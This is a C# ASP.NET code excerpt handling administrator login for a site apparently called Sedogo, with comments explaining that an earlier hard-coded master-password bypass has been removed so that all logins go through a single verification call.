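//===============================================================
// Function: loginButton_Click
//===============================================================
/// <summary>
/// Handles the administrator login button: stores the entered e-mail address in a
/// one-year cookie, verifies the credentials through <see cref="Administrator.VerifyLogin"/>,
/// and on success (or an expired password) populates the session, issues the
/// forms-authentication ticket and redirects to the admin main page.
/// </summary>
/// <param name="sender">The control that raised the event (unused).</param>
/// <param name="e">Event arguments (unused).</param>
public void loginButton_Click(object sender, EventArgs e)
{
    string loginEmailAddress = emailAddress.Text;
    string loginPassword = userPassword.Text;

    // Remember the e-mail address (never the password) for one year, presumably so the
    // login form can be pre-filled next time. As before, the cookie is written whether
    // or not the login succeeds.
    HttpCookie cookie = new HttpCookie("SedogoAdministratorEmailAddress");
    cookie.Value = loginEmailAddress;
    cookie.Expires = DateTime.UtcNow.AddYears(1);
    Response.Cookies.Add(cookie);

    // VerifyLogin is the only credential check. An earlier revision short-circuited it
    // with a hard-coded master password that accepted any e-mail address; that bypass
    // has been removed so every login takes the same verification and logging path.
    Administrator adminUser = new Administrator("");
    loginResults checkResult = adminUser.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx");

    if (checkResult == loginResults.loginSuccess || checkResult == loginResults.passwordExpired)
    {
        // Session state comes from the Administrator record populated by VerifyLogin.
        // An expired password still signs the administrator in (existing behaviour,
        // presumably so the password can be changed after login).
        Session.Add("loggedInAdministratorID", adminUser.administratorID);
        Session.Add("loggedInAdministratorName", adminUser.administratorName);
        Session.Add("loggedInAdministratorEmailAddress", adminUser.emailAddress);
        Session.Add("SuperUserID", adminUser.administratorID);

        // Non-persistent ticket: it lives only for the browser session.
        FormsAuthentication.SetAuthCookie(loginEmailAddress, false);

        // Response.Redirect ends the response, so the failure branch below is not reached.
        Response.Redirect("~/admin/main.aspx");
    }

    if (checkResult == loginResults.loginFailed)
    {
        Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Username or password is not correct\");", true);
    }
}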
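/// <summary>
/// Check the admin's password by delegating to <see cref="Administrator.VerifyLogin"/>.
/// </summary>
/// <param name="emailAddress">email is the login</param>
/// <param name="password">password</param>
/// <param name="db">database access object (currently unused: verification goes through
/// <see cref="Administrator.VerifyLogin"/>; the parameter is kept so existing callers compile)</param>
/// <param name="adminId">output - admin id, or null when authentication fails</param>
/// <param name="fullName">output - admin's name, or null when authentication fails</param>
/// <returns>authentication is successful</returns>
public static bool VerifyAdminLogin(string emailAddress, string password, SedogoDBEntities db, out int? adminId, out string fullName)
{
    adminId = null;
    fullName = null;

    // An older, commented-out implementation that compared the stored password with the
    // supplied one directly has been deleted; VerifyLogin is the single credential check.
    var admin = new Administrator("");
    var lr = admin.VerifyLogin(emailAddress, password, false, true, "API. VerifyAdminLogin");

    // Only an outright success is accepted here; an expired password counts as a failure
    // for this API entry point.
    if (lr != loginResults.loginSuccess)
    {
        return false;
    }

    adminId = admin.administratorID;
    fullName = admin.administratorName;
    return true;
}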